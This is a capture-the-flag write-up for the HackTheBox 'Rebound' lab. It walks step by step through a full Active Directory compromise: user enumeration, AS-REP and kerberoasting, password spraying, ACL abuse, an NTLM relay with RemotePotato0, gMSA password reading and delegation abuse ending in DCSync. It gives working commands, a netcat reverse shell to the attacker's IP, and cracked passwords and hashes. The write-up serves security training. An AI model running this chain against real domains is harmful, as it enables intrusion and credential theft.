Rebound involved performing as-rep roasting by bruteforcing domain users SIDs, then kerberoasting ldap_monitor account with pre-authentication disabled, spaying this password to get oorend user, having self permissions on service mgmt group, adding oorend to the group and which had GenericAll on Service Users, where winrm_svc is part of this OU granting us permission to reset this user’s password, running quser to check the logged in users, we had tbrady which had permissions permissiosn to read GMSA Password on delegator$ account, getting a shell as tbrady through RemotePotato and reading the gmsa password, delegator$ had constrained delegation to HTTP on DC01 which can then be used to impersonate as DC01$ account and perform DCSync.
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-09-13 22:36:56Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Issuer: commonName=rebound-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-08-25T22:48:10
| Not valid after: 2024-08-24T22:48:10
| MD5: 6605cbaef659f555d80b7a18adfb6ce8
|_SHA-1: af8bec72779e7a0f41ad0302eff5a6ab22f01c74
|_ssl-date: 2023-09-13T22:38:03+00:00; +6h59m59s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-09-13T22:38:04+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Issuer: commonName=rebound-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-08-25T22:48:10
| Not valid after: 2024-08-24T22:48:10
| MD5: 6605cbaef659f555d80b7a18adfb6ce8
|_SHA-1: af8bec72779e7a0f41ad0302eff5a6ab22f01c74
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Issuer: commonName=rebound-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-08-25T22:48:10
| Not valid after: 2024-08-24T22:48:10
| MD5: 6605cbaef659f555d80b7a18adfb6ce8
|_SHA-1: af8bec72779e7a0f41ad0302eff5a6ab22f01c74
|_ssl-date: 2023-09-13T22:38:03+00:00; +7h00m00s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Issuer: commonName=rebound-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-08-25T22:48:10
| Not valid after: 2024-08-24T22:48:10
| MD5: 6605cbaef659f555d80b7a18adfb6ce8
|_SHA-1: af8bec72779e7a0f41ad0302eff5a6ab22f01c74
|_ssl-date: 2023-09-13T22:38:04+00:00; +6h59m59s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not FoundFirst of all adding the DNS entries as some of the things won’t work when it tries to reach DC
Enumerating smb shares will null authentication, this shows us few shares, where Shared might be of some interest
Accessing the shared share shows that it’s empty
Moving on to enumerating users, we can try using lookupsid.py to retrieve usernames, so first trying with null authentication
This didn’t work however we can try with guest account to brute force the SIDs of the users
lookupsid.py guest@rebound.htbWe have few usernames here
ppaul
llune
fflockHaving the usernames, AS-REP roasting can be performed to see if any of these accounts have pre-authentication disabled, GetNPUsers from impacket can be used here which detects for AS-REP accounts
Here I got stuck for a while, not knowing what to do, we can specify the range for brute forcing SIDs, by default the value is 4000
lookupsid.py guest@rebound.htb 10000This gives us some more user names
Now again checking for pre-auth disabled accounts
GetNPUsers.py rebound.htb/uwu -usersfile users.txt -dc-ip rebound.htbKerberoasting with pre-authentication disabled
jjones had no pre-authentication required so grabbing the hash
hashcat -a 0 -m 18200 jjones.txt /usr/share/wordlists/rockyou.txt --forceBut this wasn’t crackable with the rockyou wordlist
We can however obtain service ticket for a SPN, performing kerberoasting through an account having no pre-authentication required
Using this https://github.com/ShutdownRepo/impacket/tree/getuserspns-nopreauth version of impacket since it has the GetUsersSPNs with no-preauth implementation
Now using GetUsersSPNS.py with the jjones having no-preauthentication required we can perform ASREP-Kerberoast to retrieve the TGS hash of ldap_monitor
Using hashcat on this hash, it gets cracked with the 1GR8t@$$4u
To verify if this password isn’t being used on multiple accounts we can try password spraying with either use crackmapexec or kerbrute also synchronizing time zone with the DC
Gaining a shell as winrm_svc through self permission abuse
Enumerating the domain with python-bloodhound
python3 /opt/BloodHound.py/bloodhound.py -d 'rebound.htb' -u 'oorend' -p '1GR8t@$$4u' -c all -ns 10.10.11.231From bloodhound, it didn’t showed anything interesting paths from ldap_monitor or oorend
But we can see ServiceMGMT group has GenericAll on Service Users OU
Enumerating ACLs through powerview.py but this requires kerberos authentication so first we'll need to request TGT of oorend user
powerview --use-ldaps -k --no-pass --dc-ip 10.10.11.231 rebound.htb/oorend@dc01.rebound.htbEnumerating the access controls on service mgmt group, oorend has Self rights on the object
This means that we can make oorend as the group member of service mgmt
Using powerview.py we can add the group member
Add-DomainGroupMember -Identity ServiceMGMT -Members oorendGet-DomainGroup -Identity ServiceMGMTNow we have GenericAll on Service Users OU and under this OU we have two domain users for which we can force change password
We are only interested in changing the password of winrm_svc user since this user can login into DC, for this we need to grant control over to oorend and request TGT after adding him into ServiceMGMT group
Add-DomainObjectAcl -Rights 'ResetPassword' -TargetIdentity "Service Users" -PrincipalIdentity "oorend"Logging in through rpcclient we can change winrm_svc's users password (the changes get reverted back so we need to do this quickly)
The password for this user will also be reverted so we can instead request TGT and login through winrm
evil-winrm -i dc01.rebound.htb -r REBOUND.HTBUsing RemotePotatoe and Reading GMSA Password
Now our next target is tbrady since he can read GSMApassword of Delegator machine account
Getting a shell through nc64.exe with RunasC.exe to get a shell with netonly authentication
\RunasCs.exe winrm_svc 'P@assword@123' -d rebound.htb 'C:\Users\winrm_svc\Documents\nc64.exe 10.10.14.142 2222 -e cmd.exe' -l 9After having a shell, with quser we can find tbrady being logged on the DC
This is going to make possible for us to trigger an NTLM authentication of tbrady and capture the NTLMv2 challenge response through RemotePotato0 .We’ll choose the second option which is Rpc capture (hash) server + potato trigger
.\RemotePotato0.exe -m 2 -r 10.10.14.142 -x 10.10.14.142 -p 9999 -s 1On our machine we’ll run socat and ntlmrealyx
sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.10.11.231:9999 & sudo impacket-ntlmrelayx -t ldaps://10.10.11.231Cracking this NTLMv2 challenge response, we’ll get the password for tbrady
So now getting a shell as tbrady through RunasCS by redirecting stdin, stdout and stderr of the specified command to a remote host
RunasCs.exe tbrady 543BOMBOMBUNmanda cmd -r 10.10.14.142:2222
Transferring GMSAPasswordReader
GMSAPasswordReader.exe --AccountName delegatorThis can also be retrieved through bloodyAD
bloodyAD.py -u tbrady -d rebound.htb -p 543BOMBOMBUNmanda --host 10.10.11.231 get object 'delegator$' --attr msDS-ManagedPasswordAbusing Constrained Delegation Without Protocol Tranision
Using StandIn we can verify that delegator$ has constrained delegation set to http/dc01.rebound.htb with protocol transition set to false
To abuse this we need to first edit msDS-AllowedToActOnBehalfOfOtherIdentity attribute on delegator$ to add any domain user that we control and request a ticket for browser SPN to impersonate as DC01$ then with http SPN we can impersonate as any domain user we want unless it's not in protected group or not marked is sensitive and cannot be delegated . (I don’t think I explained it correctly so here's the resource which can help in understanding about this scenario )
First requesting TGT of delegator$
With rbcd.py we can try reading the value of msDS-AllowedToActOnBehalfOfOtherIdentity
impacket-rbcd 'rebound.htb/delegator$' -k -no-pass -delegate-to 'delegator$' -action read -use-ldaps -dc-ip 10.10.11.231We need to add ldap_monitor add in this property as this account has a SPN to dc01 ldapmonitor/dc01.rebound.htb
impacket-rbcd 'rebound.htb/delegator$' -k -no-pass -delegate-to 'delegator$' -action write -delegate-from ldap_monitor -use-ldaps -dc-ip 10.10.11.231Requesting this account’s TGT and then impersonating as DC01$, reason being we can’t impersonate as administrator as it’s not allowed to be delegated
getST.py -spn "browser/dc01.rebound.htb" -impersonate "dc01$" "rebound.htb/ldap_monitor" -k -no-passNow impersonating as DC01$ with HTTP SPN with the ticket obtained from browser SPN
getST.py -spn "http/dc01.rebound.htb" -impersonate "administrator" -additional-ticket "dc01\$.ccache" rebound.htb/'delegator$' -hashes :'CD903918320095660FF2E12072F5551CMake sure now to have dc01.rebound.htb in hosts file
With secretsdump NTDS file can now be dumped
References
- https://www.thehacker.recipes/ad/movement/kerberos/kerberoast
- https://github.com/fortra/impacket/tree/e915faa15c13a1f68bd6e067f8f9a8de21cef7d7
- https://www.semperis.com/blog/new-attack-paths-as-requested-sts/
- https://github.com/aniqfakhrul/powerview.py.git
- https://www.thehacker.recipes/a-d/movement/dacl
- http://www.selfadsi.org/deep-inside/ad-security-descriptors.htm
- http://www.pseale.com/pretend-youre-on-the-domain-with-runas-netonly
- https://github.com/antonioCoco/RemotePotato0
- https://github.com/rvazarkar/GMSAPasswordReader
- https://www.thehacker.recipes/a-d/movement/kerberos/delegations/constrained
- https://github.com/FuzzySecurity/StandIn
